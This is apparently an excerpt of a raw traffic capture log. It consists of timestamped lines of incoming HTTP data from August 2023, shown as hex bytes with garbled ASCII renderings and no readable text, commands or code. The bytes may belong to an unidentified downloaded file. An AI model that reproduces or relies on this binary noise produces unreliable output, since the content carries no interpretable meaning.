                                                                                                                                                                                          2023-08-10 08:17:30 UTC6INData Raw: 6c 68 63 af dc 47 98 17 55 52 a8 b7 96 05 a2 e0 d4 d5 77 3f e3 cc d2 49 74 11 76 46 09 98 e0 6b 89 44 e2 b9 bf 2e f6 87 5d cb 9b 7d 38 32 d4 f7 50 e9 44 ac ee c3 87 a7 ae 53 fc 49 fc af 2a fd 83 b9 7b ea 3c 37 9d 6e 20 8f 0f 6c ba c1 4c ca 9d 5e 03 ff c9 e3 23 54 cd 67 ba ef 4a 6b 3f cb 18 cd 53 ae e8 60 02 13 da e3 a9 3c 48 f7 4b c7 a5 a4 17 8b 04 e7 58 ea 9a 63 d5 03 07 52 e9 49 bc 0c fe 75 ea d3 f7 58 15 74 86 be d8 20 f2 ed 21 7d bb 95 23 48 ad 49 97 64 6f 98 df 06 6d 6a fa 1b 18 1c e9 eb 91 63 43 02 f6 92 16 62 d8 90 88 3e 7d 87 2e f7 8f d6 6c 32 2e 89 53 69 cc 91 2d 05 fc 48 f4 b3 b4 43 0a 02 64 74 ac 05 54 9e ea ad 51 f9 21 06 c4 8a 9b 9b 3f db f9 41 a2 6c 3b ac de 3e 70 82 41 f4 d9 85 fb 1e 16 b7 ab 39 3c b0 96 b8 e7 05 65 d5 2c 36 01 37 2e 49 ec
                                                                                                                                                                                          Data Ascii: lhcGURw?ItvFkD.]}82PDSI*{<7n lL^#TgJk?S`<HKXcRIuXt !}#HIdomjcCb>}.l2.Si-HCdtTQ!?Al;>pA9<e,67.I
                                                                                                                                                                                          2023-08-10 08:17:30 UTC10INData Raw: 71 b2 da 65 f7 ef 6c 7e 93 05 d7 9b 47 bd bd e7 63 0b 7c e4 32 fd 5b 6b 0b 0b 5d 3f 29 ca 15 a7 61 b4 d9 70 a7 f9 7b 26 47 c4 63 74 7b 39 19 26 59 57 02 b5 ef d9 0b 4d a7 65 81 29 12 08 d2 6d 17 27 18 9d db e5 1d 85 5e fc 8e ac 15 b4 ac cf 6c f9 81 31 70 55 ec 13 e0 d2 9e c7 c1 21 03 9e 7c 5c 32 f9 60 8c 4d 02 47 e8 28 1b c4 28 d0 ba 58 67 ea f5 5c c3 ca ed 7e a8 fd 81 e8 4a 89 94 a3 cf c8 89 9f 9c 48 4e 20 60 1d fe 91 62 36 61 88 53 fc 35 14 82 f2 4c 4e 39 df 65 dc 89 07 1a fb 11 bc 51 87 0a 7a d9 97 9e 12 0e b7 b4 e1 1b 15 7d c8 a3 f5 0e f5 b2 21 29 5d ea 79 68 da cf 75 4c 07 4c f7 64 64 75 6e dc d5 8c a0 bb 0b 01 b0 09 67 a9 c2 4e f6 2a b9 33 30 e3 73 29 b9 49 81 34 3c 21 16 4d 1f 12 95 60 b8 34 f0 7c 55 85 18 0b 47 93 fb 57 d2 d8 a8 84 92 1d d1 f1 4f
                                                                                                                                                                                          Data Ascii: qel~Gc|2[k]?)ap{&Gct{9&YWMe)m'^l1pU!|\2`MG((Xg\~JHN `b6aS5LN9eQz}!)]yhuLLddungN*30s)I4<!M`4|UGWO
                                                                                                                                                                                          2023-08-10 08:17:30 UTC15INData Raw: e7 07 da 65 3b 27 90 f1 fd 03 38 09 12 c5 36 6e a2 9b 1c cd d7 d5 fa a1 dd c9 d3 af 6f bc 2f 13 0e e4 95 3c db 4c 12 01 0b 1b 66 ac d6 38 39 94 28 c5 aa b0 2b 22 77 7d 4c b2 49 19 07 8b 91 b8 cf 81 e8 cc ca 17 7e 2e 75 2b c9 a9 22 9d f8 4c 27 a3 a2 ee b0 c1 c5 da 71 39 ad d1 34 ed 45 98 c9 ac ba a5 6e e3 d3 32 8c ea 0d 27 c2 af be ce 87 0a de d2 24 cd 8e 9f 4e d2 5f b3 33 66 98 e8 b6 5d 6b 8f f9 73 18 7d fd 33 73 b7 66 98 c3 d5 ec 33 5a 53 6d 5d 1d 72 85 f9 13 d8 1c c3 a2 70 17 fe d0 6c 82 86 9e 47 83 fa 48 e1 58 a3 b2 bf 26 66 e6 7c 4e 10 c4 58 81 f3 5d e1 8f 0b 8e 91 ee 63 2e eb 33 9f d6 a8 b1 d8 17 46 72 7c b8 b4 13 34 81 23 53 b4 2a 4d 04 63 67 a8 ae d2 80 1c 7b 4b 64 03 dd 59 a8 83 15 d7 61 5f 8a be f3 cb 6d 72 58 2b aa 44 6c 42 83 29 ff a8 92 85 7b
                                                                                                                                                                                          Data Ascii: e;'86no/<Lf89(+"w}LI~.u+"L'q94En2'$N_3f]ks}3sf3ZSm]rplGHX&f|NX]c.3Fr|4#S*Mcg{KdYa_mrX+DlB){
                                                                                                                                                                                          2023-08-10 08:17:30 UTC18INData Raw: 1e b9 ee c1 65 c9 a7 9e 9e 78 13 85 41 da f5 89 8b 8b 1d b5 78 48 f9 32 48 11 62 e1 3b 07 5f da ec 55 d8 ca 13 9e b7 c5 1e 03 be cf e7 87 a4 5e 3b 54 e4 34 d1 90 a4 e9 1f af 10 60 10 6a df 23 55 67 61 83 8f aa 59 12 05 45 92 ab d1 30 f8 2c 81 ce 30 51 d8 b3 02 51 51 54 c2 c9 a1 a1 31 46 ab 92 60 0d aa d9 05 60 02 76 4c 10 55 9a e1 64 d4 dc b3 db 08 04 84 8d 18 0e 6b 11 a3 9b 31 93 55 67 80 f4 90 8a ec da bb c8 9c 15 94 24 f3 e3 2a 20 58 be fa d7 7a f8 3c f3 bc 23 68 7b 44 94 be d8 92 1d d7 8d 84 b3 45 08 33 a2 9d 77 47 6a 35 a0 94 5f b5 b2 10 ab 45 d5 ef 18 cd ea a8 e8 60 02 9e 41 e3 a9 3c 48 cc 81 c8 e9 6e 5f fe fc d4 83 2d df 9f 2f 03 bf 52 62 04 5e 96 8d 0f f4 8c f8 18 af cc 87 f2 15 b9 b9 00 a3 5f 6c 0c 90 dd cf b0 3c c8 a6 e4 bd a2 76 e8 07 76 96 fc
                                                                                                                                                                                          Data Ascii: exAxH2Hb;_U^;T4`j#UgaYE0,0QQQT1F``vLUdk1Ug$* Xz<#h{DE3wGj5_E`A<Hn_-/Rb^_l<vv
                                                                                                                                                                                          2023-08-10 08:17:30 UTC19INData Raw: cb 3f d3 0b c2 51 36 93 bd a0 01 53 79 15 0e f3 4b 2d da f7 96 b2 b3 26 34 d0 3f 2e 83 e2 6c 74 f6 b5 28 5a 33 54 52 d9 35 c4 63 0e 20 3d b0 5b 3e 8a 29 f0 f4 25 69 4b b9 3d 3c db fb 52 84 ea 6f 87 31 cb 52 ee b5 8b bf 69 f4 74 15 53 29 0e cf 67 90 11 b0 d8 78 d3 55 ae 8a 69 f5 5a 42 81 83 f1 39 57 fb 48 0c 0d 53 65 e8 5d d3 f7 c0 b1 da 5b 6e c9 ad d9 c3 83 34 a8 f3 20 d4 9f e7 e5 ab d7 a5 33 70 7b 3b d8 0e d9 08 90 b6 64 e5 c4 5b 8f 18 78 4c 78 bf 53 b1 70 8c 10 b3 35 e7 e9 e6 1c 38 5b 5c ce 65 32 b2 74 57 8c af 7e 90 b1 54 19 8b a0 88 90 14 4f 50 7b c0 9d 34 00 f0 47 e1 42 28 29 0f 18 d4 40 ab 7a fe 34 06 ad ff 9d f4 4f 8a 3c 57 6a a7 42 d5 6e 57 6d 0b 2f 85 07 51 60 2a 2d d9 26 cd 05 2d 76 09 19 7a f5 9b bf 70 4d c9 4f ac 8c ef b6 76 aa 1a f3 71 0d 7f
                                                                                                                                                                                          Data Ascii: ?Q6SyK-&4?.lt(Z3TR5c =[>)%iK=<Ro1RitS)gxUiZB9WHSe][n4 3p{;d[xLxSp58[\e2tW~TOP{4GB()@z4O<WjBnWm/Q`*-&-vzpMOvq
                                                                                                                                                                                          2023-08-10 08:17:30 UTC20INData Raw: ae 39 4a 5d 14 6e a5 64 aa dd 0f eb e8 f5 f4 73 d9 ef 23 2d f4 cb cd 74 39 39 95 fa aa 5f da eb 44 c7 d8 fa 5f a8 54 0d 43 7b 5e 5a 97 f0 a6 63 42 15 77 36 c2 c0 f8 cc 15 68 a3 e3 57 13 fb 6b 70 f8 75 f3 81 42 1f f2 2d 26 9f e3 27 11 dc 70 73 e4 46 1e e4 ea 71 22 b3 e7 14 2d 1b 4f c1 b1 26 1d eb c7 11 1e 36 5b c8 18 7c 88 10 8e bc ea 93 fc 79 f8 8e 7c ac 59 92 5a 82 2d 7c 91 4d 20 f9 1b a4 62 c5 d5 d8 13 8c 46 9d 81 0f a5 0b 99 ee af cd 2c 72 27 1a c6 43 58 8a 19 68 7d 38 32 6d 99 65 a1 29 2f 2c bd 71 0e d0 99 ad 9e 24 b0 52 2d 59 d6 9f 24 b2 a2 31 28 f4 9d 49 97 2d 5f f0 03 79 64 f2 86 45 a3 a8 57 94 b9 3e eb 13 14 18 2a 78 7d 80 c6 5f 97 ee a3 9e 59 64 50 a8 de e4 b7 94 80 08 5a 88 50 74 b9 b5 81 b5 b0 cc 20 e7 a4 15 b8 51 80 44 d6 12 55 a6 d9 fe 2d 0a
                                                                                                                                                                                          Data Ascii: 9J]nds#-t99_D_TC{^ZcBw6hWkpuB-&'psFq"-O&6[|y|YZ-|M bF,r'CXh}82me)/,q$R-Y$1(I-_ydEW>*x}_YdPZPt QDU-
                                                                                                                                                                                          2023-08-10 08:17:30 UTC21INData Raw: 55 62 ae d4 ab 14 b0 40 6d cf 54 f0 78 db 3b a0 20 31 d4 89 a1 40 55 91 ed f6 70 bb d1 6b 12 ab bb dd f4 af d5 9c 79 4b cb a3 eb 56 1b 2e 90 ba 32 8c 92 1e c7 88 2a d3 a9 ce f0 95 43 d1 7e f4 91 44 42 2c 21 bf 85 10 17 e8 77 37 df b0 cb d2 13 7a 44 35 25 c6 4b 4a 1e 23 75 c4 af 9c 76 9c 83 a3 d9 43 8b e5 98 bc 89 34 72 c3 95 fb f3 57 6a 3e d7 08 1e 56 0c 5f d3 9d 7a dc bc 12 6e 92 69 ad 2c fc 46 25 f0 7d eb 44 5b 7c 43 8e 65 18 04 39 e2 31 4a d8 1c 6d 1d 48 68 10 b3 6b 9d 2e 29 31 35 8d 4b 15 32 ea 89 8b e1 cb 98 22 e7 cd 6a 8c 49 50 10 a5 e9 b6 ca 34 16 93 eb d5 79 ea 02 15 2b ef 9d 13 df b6 c1 cc de 5d 07 e9 bc 97 34 4c 82 94 87 1e dd 5f 40 54 9b bc be 8e 82 3b 8b 34 bc 2b 96 29 e0 fd 95 28 bd 39 b7 36 2c 6e d4 ff e1 e6 73 77 0d d0 0f d4 f7 19 8c fe 53
                                                                                                                                                                                          Data Ascii: Ub@mTx; 1@UpkyKV.2*C~DB,!w7zD5%KJ#uvC4rWj>V_zni,F%}D[|Ce91JmHhk.)15K2"jIP4y+]4L_@T;4+)(96,nswS
                                                                                                                                                                                          2023-08-10 08:17:30 UTC22INData Raw: d8 81 72 b7 c5 8f 46 31 da 3d 34 34 06 1b c6 62 6b d1 c5 0b 7b a9 0a a7 6c 4a 43 9b e4 cf 53 30 34 13 41 bc 26 13 5c a8 38 df 8c 58 40 01 d2 29 ec c4 94 b9 de c8 70 16 e1 d7 6a 97 7f 29 f5 01 5c ca 3d f2 62 85 02 04 93 90 ff 2e a0 ab b1 fa 68 ea 85 45 b2 8b 6f 08 c0 42 c6 22 4f 72 c3 8e 08 db 1f 23 bc 13 61 8e fd 38 67 13 5b 57 57 68 0c f2 5f 45 07 c2 75 f9 73 64 d0 ab 48 5b fb 56 c4 45 cc 4d b9 36 21 d6 af 3c be 4f a4 ba 49 96 54 eb 34 16 fc 32 fa 08 6d 5c 86 2b 71 40 39 f9 82 dd 17 c6 79 da d6 2b d5 55 33 2e 0b eb 11 92 74 01 cd ae 31 47 52 50 11 eb 7d 8e c1 1b 33 02 89 e8 45 58 98 ee 98 8c 93 db ce f9 64 66 18 95 d0 51 a3 77 e9 08 e6 34 c1 59 ad 5f 91 1f 4e 1d a9 02 6b 53 c9 2d 56 00 93 81 6a db 4a 8c 3c 2d 63 e4 22 4c bb c4 9f 84 ba b0 8f 9f f3 83 f2
                                                                                                                                                                                          Data Ascii: rF1=44bk{lJCS04A&\8X@)pj)\=b.hEoB"Or#a8g[WWh_EusdH[VEM6!<OIT42m\+q@9y+U3.t1GRP}3EXdfQw4Y_NkS-VjJ<-c"L
                                                                                                                                                                                          2023-08-10 08:17:30 UTC24INData Raw: e5 d7 a1 56 5e b2 e7 7c 49 da db f0 d1 12 99 7c c9 fa 9b b1 a9 db c9 5f ee 63 21 92 c2 e6 51 6e 46 1e 02 be d5 ea 45 a1 06 4b 0e f0 91 33 4c a2 59 b5 19 1a 57 96 69 72 98 c5 7a d1 3e 2a 6e 36 23 3d c0 e1 1a 9a 96 03 7b 82 c0 e4 a1 7b af 54 0a 61 8a c9 37 cf a6 d6 32 24 6e 2a 6e 13 33 5a 7a 73 c0 08 77 76 52 53 5a 1f dd 12 8f 48 18 ea 7c c2 9c 17 dc da 3d c2 30 a8 f1 94 f9 de 60 ec 96 b9 8b 12 36 75 19 ff 13 b8 a3 e6 63 7c be 73 fa e5 a2 64 4d 5d 4a 6e 39 43 46 89 40 e2 f9 d0 6e 3e b2 3d 30 a1 35 d2 25 df ce 69 1a 15 45 4e 59 76 a2 ad 80 da 3e ce c7 c1 30 db 24 f2 f2 0c 47 4c de f8 ce df 3b 3e f2 f2 ca 6d a6 f5 73 1c 3d ff 49 2b 75 41 cb 3e 0f b4 6f 46 ee 20 06 0b e5 fd c3 a8 04 79 66 36 36 7e cc 57 50 2b 4a f7 08 59 d1 41 e8 1e 3b 6d e5 ea 8b ff 79 7f e2
                                                                                                                                                                                          Data Ascii: V^|I|_c!QnFEK3LYWirz>*n6#={{Ta72$n*n3ZzswvRSZH|=0`6uc|sdM]Jn9CF@n>=05%iENYv>0$GL;>ms=I+uA>oF yf66~WP+JYA;my
                                                                                                                                                                                          2023-08-10 08:17:30 UTC25INData Raw: 2e 54 04 15 b9 7a 93 a3 13 52 86 31 c7 0a 79 2d 8d 8f 57 7c b1 e1 e2 3c 63 1c 7c a7 aa 03 1e e9 fe 0f 60 b4 2b cc e3 62 e7 bf 15 ce 84 ab 2a 05 a1 74 fc 51 72 8b 01 fe 31 bb 44 ea f1 47 e8 3d 0c 42 2c 6e bb 3d 03 58 63 72 e4 c1 75 f6 35 b6 b6 dc c9 34 fd 6b 30 fd 39 28 61 6b 95 48 6a 46 4b bb 0b 35 4d 4e 9f 0e e5 bd ac 5b 43 7a c8 f3 c4 50 d9 c6 ac 49 ae 38 17 b9 8a 46 51 a0 6f 21 e0 65 1c ec 0f 35 07 82 1f 78 52 9c 2b e2 71 97 f3 a5 44 71 22 f3 f2 0a 47 b8 85 cb 8f f5 f3 9b ba 27 ab 3e ff 6f b5 9c 35 5d 7c fd 98 c3 24 c3 d3 43 7f fe b8 a7 ab 8a ef 88 69 ee 5d 43 a9 34 a2 18 cd 04 46 3c df a4 2c 10 b5 32 75 dd bd 2e e7 b5 2a 66 89 21 1a 84 d0 0b 86 10 9e 86 8d c0 19 ee fd fe 6d 16 17 db 63 96 31 25 e8 bb 0d 01 5b 9d 33 d3 54 78 86 59 46 7c 9d 97 23 05 c3
                                                                                                                                                                                          Data Ascii: .TzR1y-W|<c|`+b*tQr1DG=B,n=Xcru54k09(akHjFK5MN[CzPI8FQo!e5xR+qDq"G'>o5]|$Ci]C4F<,2u.*f!mc1%[3TxYF|#
                                                                                                                                                                                          2023-08-10 08:17:30 UTC26INData Raw: db 8d ba 60 5a ca 0f 8f 80 84 6b da 09 a3 7d 76 43 32 f7 52 28 37 10 39 90 0f 97 21 d1 de d4 72 e0 a6 d4 c5 1b d0 be 6e 93 0d 16 62 62 29 97 98 84 b6 c6 32 be 5d ed 81 a4 98 86 64 a3 ee d5 36 87 f6 5f 4b 22 b6 51 d6 8e 6b f1 1f 1e d3 3b b1 08 3a 78 58 7d c2 c1 95 f4 c0 4f 98 83 0b c1 33 9e 15 25 3d 87 2e 30 e5 77 f6 ab 25 09 51 6e 9c e3 d6 d0 e6 f1 50 47 7b 0b 29 ef 2a 0e 7d 83 e3 f3 dd a3 62 18 4a e8 ef 4c 92 e4 b6 85 49 c9 5d 0f b7 97 65 1d 6a 7a cc 2a 8c 99 2f c2 5a 83 a5 d1 1f 02 66 0e b5 ba e7 39 1e 9a 23 00 c3 68 32 3f b2 a6 11 35 60 ae 63 15 e3 02 b2 a3 5a c6 73 1d 7d 94 ed e4 22 5e fc d6 06 f3 c1 de 7f 65 19 2d 66 9d 2f 31 6e f5 fd 38 dd ac a3 6b 43 c8 9d 0e a5 59 aa e7 7b bd 3d 83 5f a1 41 e5 54 35 3c 87 6a dc 50 a4 09 ca c6 53 e4 dd 3b 16 e1 94
                                                                                                                                                                                          Data Ascii: `Zk}vC2R(79!rnbb)2]d6_K"Qk;:xX}O3%=.0w%QnPG{)*}bJLI]ejz*/Zf9#h2?5`cZs}"^e-f/1n8kCY{=_AT5<jPS;
                                                                                                                                                                                          2023-08-10 08:17:30 UTC27INData Raw: 0c 33 02 e6 a9 21 87 43 34 c3 95 c8 e1 20 a2 57 64 2b 79 bb ac df 01 93 67 2f 34 79 28 92 cf 2e 94 ca c5 c5 ea 57 fb bc 80 91 6c 0d 95 66 57 98 6a 4a dd 86 83 ce 44 0c 21 a1 a4 32 2a e6 39 6b 16 78 f3 86 08 59 3a c0 1d ed ee 3d c9 97 4e a8 6b a5 1d 42 09 ca bb 6e 55 1f 8b 19 97 b3 c9 99 e4 c5 ed 28 d8 3f 0d b2 46 30 60 29 9b 52 ca f6 d5 29 e7 58 8a 01 1b 83 f8 69 15 34 90 ae 55 91 1c 53 7a ff 33 56 54 bf e2 c7 d4 db 39 4f 4e 64 c5 4a 75 b5 4c a2 47 5d fb 44 29 2d a7 cf c6 3d 40 32 d8 37 6d a2 63 53 9d 58 fd 7f 7a 5a fa 50 7a 63 a5 da 55 8c b7 31 e3 5b 49 eb d5 af db c1 fd 3f bb 55 33 ce 0d 96 b9 03 d5 5d 94 3e e3 0a 0b 5d 6c 7b a4 2c f3 0f b8 8e 04 55 f5 34 0b 69 6d ca cc f8 a0 7b a4 11 35 28 ad e4 77 e8 70 21 0a ea 34 84 f6 62 ff cf 08 de c9 09 7d 24 93
                                                                                                                                                                                          Data Ascii: 3!C4 Wd+yg/4y(.WlfWjJD!2*9kxY:=NkBnU(?F0`)R)Xi4USz3VT9ONdJuLG]D)-=@27mcSXzZPzcU1[I?U3]>]l{,U4im{5(wp!4b}$
                                                                                                                                                                                          2023-08-10 08:17:30 UTC29INData Raw: 04 eb f9 59 72 0b c0 6e ba 3a a2 f8 8a 85 a2 99 55 76 40 35 b3 49 06 0d 17 92 08 c3 c6 e7 bd 8c 84 4d 5f 02 04 cb 19 20 b7 ea 8a 08 d4 e3 ba 64 65 9a 33 f5 0c 3f ac 7c 75 fa ab a6 00 b3 31 74 92 93 81 a1 79 9e 3c 31 f3 33 fa f2 df 2b dd 91 e8 80 8e e5 77 15 9a 87 9d 93 bf 85 b0 cf 78 7d 30 59 f1 00 3c 10 39 45 78 a9 b2 36 56 2b f3 a4 28 59 73 40 a0 0c 85 a9 cf 3b ce 5f 38 2f e2 e8 df 04 62 07 44 75 1f 53 ea d7 16 09 28 bb a7 22 b1 f9 62 f6 7f 92 28 f4 68 df a1 14 52 70 8a 2d f8 38 0b 27 e5 54 cf 2a b0 44 33 d8 89 e9 ac 4f b8 c8 61 34 da 88 4f 41 59 5b 7b a9 79 47 b4 50 33 b6 cf 8c e5 10 10 2a d4 18 ed b3 62 c4 d9 83 89 4d 75 d6 92 02 3e ad fb 1e 70 37 d2 6f 6e 8b 78 52 ae 31 09 c4 f5 06 fb aa bc 62 dc d4 9f 31 74 7b c1 c1 f2 b5 c2 1e ad 0f a4 27 f4 06 08
                                                                                                                                                                                          Data Ascii: Yrn:Uv@5IM_ de3?|u1ty<13+wx}0Y<9Ex6V+(Ys@;_8/bDuS("b(hRp-8'T*D3Oa4OAY[{yGP3*bMu>p7onxR1b1t{'
                                                                                                                                                                                          2023-08-10 08:17:30 UTC30INData Raw: 52 a2 6f 9c 7b 38 d6 ae 3c 67 f5 30 7b 9f 8e 2c ca 07 67 b3 87 e9 c8 a1 10 d0 99 96 af 98 90 ce 1f b1 1a 1c 12 d1 21 ac 93 04 83 83 e8 a0 94 c4 02 28 82 49 68 42 9d 58 37 ab ce 9a 47 5c 85 1f aa b6 71 e8 ec 0b 68 6d f5 21 cc 69 b6 da 01 ab 36 cb e3 c6 e0 29 a2 18 45 cc d7 3a 65 89 f1 b3 f4 87 da c8 68 5b 69 a1 64 7a 95 79 b9 0b 11 bf b9 1e 18 28 70 3e f4 a5 6a c9 85 e8 f2 b2 96 d0 8b b8 10 a6 12 c7 2b f5 8c 51 7d d7 94 cf cd 59 6b 84 17 a2 eb a8 ca ee 96 17 14 16 ce be ef 27 bc 5d d9 30 2e 97 6b a1 62 29 cd b8 e7 6b 23 4e bc a6 08 cc a0 54 b1 2a 87 ec e5 d5 a1 a7 2a d0 70 04 2f ab ea 57 f6 4f 6e 1f 5e 8a bf a1 37 98 17 0d 23 37 20 55 3e 65 c3 76 76 cc 00 d3 02 7b 14 ec ec 69 34 b8 99 50 d7 7e 1a 01 20 44 52 fb 27 47 f1 ad 30 36 54 fc 29 43 88 f3 20 1a 30
                                                                                                                                                                                          Data Ascii: Ro{8<g0{,g!(IhBX7G\qhm!i6)E:eh[idzy(p>j+Q}Yk']0.kb)k#NT**p/WOn^7#7 U>evv{i4P~ DR'G06T)C 0
                                                                                                                                                                                          2023-08-10 08:17:30 UTC31INData Raw: 82 f0 29 a2 1b 47 69 18 ba 07 0b 32 ae 9b 4a fc c1 c9 82 c9 54 87 19 a7 c5 1c fc 51 d3 bc 60 2f a8 ea 32 53 bc 68 48 c2 2f 98 7c a7 6e 0f db 8e 47 73 6e 39 74 33 79 9b 04 88 62 33 06 c7 e4 b7 c2 3a 7c 6f a8 d0 1b 59 3e c1 73 ba 02 ef b3 24 61 35 a4 6a ec 3e ce cb b8 ea 3a 6a d5 1a 01 62 c8 5d f5 61 03 b3 07 08 a3 be 8f 25 82 ec 75 cf d3 65 97 1d f8 71 da 82 2e d9 75 6f 19 23 cd 76 2e 61 37 ce 56 12 5d 09 bb d3 dc 86 11 10 bf f2 fa 16 9f ab ca a3 86 fa ca b9 e1 f5 b4 0c f3 14 86 0a ab 60 39 9d f5 4d 89 1f 26 ee 7d 80 b5 a3 81 79 05 18 c9 13 23 e9 f3 a8 d2 39 6e ce 9c fc a7 3c 65 c7 cd 42 95 7a 2c e4 cf c2 d1 5d f1 e1 86 c1 4b 1a 79 a4 ad 82 26 1c 4f 36 cf 09 94 bd 25 f0 c8 ed 30 e2 06 b6 22 68 2f f0 59 67 0b e9 b5 f6 6d ab 97 0b c7 9c f9 45 46 37 ee 83 47
                                                                                                                                                                                          Data Ascii: )Gi2JTQ`/2ShH/|nGsn9t3yb3:|oY>s$a5j>:jb]a%ueq.uo#v.a7V]`9M&}y#9n<eBz,]Ky&O6%0"h/YgmEF7G
                                                                                                                                                                                          2023-08-10 08:17:30 UTC32INData Raw: 30 6d 5c 70 6d 6e 36 ea 15 1a e2 34 1d af 2f 5d 24 88 3f 18 4f 64 4e 75 49 13 bd 1a cf 08 d1 c0 ed 8a 1d d9 9e 82 cd ce 25 08 e1 03 57 b2 60 4b 43 92 60 16 71 02 67 45 95 a3 d9 cf 1b 06 7a bf a0 50 c1 a6 e9 f7 40 a6 75 b6 f5 51 5d 68 24 a2 53 7d a6 a4 2b f1 cf f8 2e 49 6e 79 10 87 f4 3a 6d 35 e0 ca bf ff 35 13 58 cb 17 b9 51 6f 01 f7 24 d0 e2 6c ac 4c f2 8e a4 4a 40 d7 7d 1c be 46 4f b0 2c 9c 06 99 fc 03 a0 dc ed c9 8c 55 5d 05 1c 08 02 9b f1 98 15 ee 0d 12 25 c5 06 0c 94 cc ec 28 6c bf 6f 86 97 79 a0 c4 b9 d1 ad 49 cd c9 25 07 0d d0 2b ee ed 7c 00 84 be 87 88 51 c0 88 0f 96 3c 6b 6a f7 bf 6d 0f 98 23 0d 70 2c 78 06 1f ce 5a e0 06 b8 c9 47 b7 4b 22 55 84 10 fc 2f 9d c6 44 d8 b7 24 4a 45 2f 2b 15 57 7a ab 80 5e 4c 1f 5b 28 6f 45 ba 19 4c 8b 04 2d fc 28 bb
                                                                                                                                                                                          Data Ascii: 0m\pmn64/]$?OdNuI%W`KC`qgEzP@uQ]h$S}+.Iny:m55XQo$lLJ@}FO,U]%(loyI%+|Q<kjm#p,xZGK"U/D$JE/+Wz^L[(oEL-(
                                                                                                                                                                                          2023-08-10 08:17:30 UTC33INData Raw: df 07 80 01 23 51 fb d2 c3 cc d5 35 0a db 57 93 70 5b cf fa 9c 39 fc f4 69 4b a5 2f 23 1c 07 6e de 35 c2 35 d6 f9 64 07 66 3d 50 c8 86 62 4f 69 25 dc 16 d7 a3 79 4c e6 81 5a 8a c5 13 7f 0a cd e6 5d 49 0e fa c2 a1 4e 96 e3 59 b7 90 38 da 2e 9e 07 3c 97 dd 07 6f 49 bb d8 a5 87 8b 76 47 56 cf 65 b4 9a c8 91 8d 81 90 68 8b 21
                                                                                                                                                                                          Data Ascii: #Q5Wp[9iK/#n55df=PbOi%yLZ]INY8.<oIvGVeh!
                                                                                                                                                                                          2023-08-10 08:17:30 UTC34INData Raw: 66 6f 86 03 40 b9 a7 8e 3f 75 4b 09 97 1b 8d 3c 49 63 cf 85 c2 32 76 22 8b 5d c9 8e 42 c5 7a 49 0b 50 18 85 0c 9b 79 ec 31 cc 70 da 8e a5 9a 29 c6 f7 09 0c 85 df b6 46 e3 fd 66 94 46 1f 16 9a 22 3d 6b f0 20 74 4f 50 bc 58 1f 0d a3 c6 7e 51 63 ef bb f9 f4 b7 d5 05 70 85 1a bb 8c 52 41 67 9d 04 22 b8 bf 8e f4 9b 40 d0 fd e0 54 3e c0 1b c2 bf 76 5c 2f a1 2b ca b7 e2 d5 50 5a fe fc 89 c2 a4 6b 39 c6 56 f9 33 03 99 a8 b0 b9 b7 b9 4c 44 17 d0 03 bb d3 4f ec 36 a2 b4 21 ff 95 4f 00 10 a0 a3 60 a9 fa e5 81 e5 43 d6 7f fe ea 74 b9 e3 08 b4 ff bb d3 12 19 40 c5 31 3d 94 10 c3 02 f6 84 15 fe 63 80 03 12 88 62 a2 95 98 7c 49 3c 3d 15 69 89 24 7d 70 a4 b2 74 07 ca 5c 7c f4 cc 2b 2a 7a 91 b0 27 63 2c 96 14 0a 06 f4 44 a8 66 3b 57 b3 2e 18 80 a3 5f 63 71 96 e8 82 d0 dc
                                                                                                                                                                                          Data Ascii: fo@?uK<Ic2v"]BzIPy1p)FfF"=k tOPX~QcpRAg"@T>v\/+PZk9V3LDO6!O`Ct@1=cb|I<=i$}pt\|+*z'c,Df;W._cq
                                                                                                                                                                                          2023-08-10 08:17:30 UTC35INData Raw: 7e f2 cd 0a 01 78 b0 22 30 4d e8 dc b8 b0 38 af 01 f5 ee 12 b3 b4 6c 51 be f5 2b e8 05 3b f0 d9 84 05 da 71 df 0f 6e 6a c1 34 c3 7e 51 61 6c 4e 7e bb f3 55 63 d5 0a bb 3a 50 68 3c 24 a0 b9 05 ff 72 19 62 63 88 2c 64 38 9d 0c cc f7 5a 11 c4 4e 28 d6 d9 0a e9 2a 9c 8f 4f fc 2c fc f8 a9 92 d3 47 0a 19 f6 80 b6 0f 1b 3f 59 59 e0 82 e0 4f a0 20 02 9e 0e f4 99 a3 2d 88 51 bc 52 79 a9 35 26 3d a6 c8 2c 93 fe a8 95 e7 a7 d0 10 b7 99 61 aa 3c da f6 6c 45 50 91 71 b3 42 88 6f 3d 26 d3 94 e8 94 a7 c9 36 8f fd 6c fb f5 46 a8 f3 f8 f6 6c 71 e9 7f 9f c2 a3 68 d7 7f ac 0a b5 be 8c 93 d2 47 ca 53 fd 0b 32 d0 9b 34 98 4c 32 5f 08 bf 88 20 fe eb 1a 19 53 32 87 eb ff 51 47 23 ab 70 9d eb d4 9a 2a 65 ea 0f bf 88 a1 25 0a 23 28 60 01 db 37 67 f1 48 b4 5d 93 fd ed 2d e2 8e f5
                                                                                                                                                                                          Data Ascii: ~x"0M8lQ+;qnj4~QalN~Uc:Ph<$rbc,d8ZN(*O,G?YYO -QRy5&=,a<lEPqBo=&6lFlqhGS24L2_ S2QG#p*e%#(`7gH]-
                                                                                                                                                                                          2023-08-10 08:17:30 UTC36INData Raw: 91 77 b3 c3 65 2b b2 6b 51 72 f8 57 35 7d 2d 5e 46 d2 8a 76 9f 53 e0 fd 3d 7b ed 30 60 b1 41 12 7a f7 51 e6 0c d8 36 21 cf 35 63 6c 69 bc 3e 26 ee e1 f4 4c b8 d2 20 53 e7 b7 7e 02 35 2a f3 d3 63 7a 4e d5 49 59 3e 0e 3b 11 ac ed 64 7a 58 64 fa c2 bb dd 7d c5 4a d3 89 6a f0 d3 d5 ba b5 82 d7 0f 5b f8 4d 9f e1 db 32 40 13 d5 ee 6c af 35 84 41 c2 8d 7f 19 a4 b0 8b ae 6f 7c 30 a4 bc ad e9 34 69 65 1b 34 7d 1e ef 8b 83 a1 e7 9e 3b 97 54 2d 36 bf 4a 89 5a 50 81 a5 96 51 23 2a 00 5f 4c 12 a9 90 19 af 2d 21 b2 93 22 80 53 76 ff 02 3e 10 54 1e e9 4b bb 2e 59 59 57 9a 5c f2 20 9f 20 eb da 20 2e 19 38 99 b9 47 83 04 10 6e 60 46 5d 75 c7 d5 b8 d5 d6 87 91 8e 8f 76 b0 15 30 6e 1d b2 4d 05 e5 61 be a3 0e 27 69 a3 ba ee ce e2 6e 1c ae 39 0d 77 5b 07 57 b6 26 2c 56 44 83
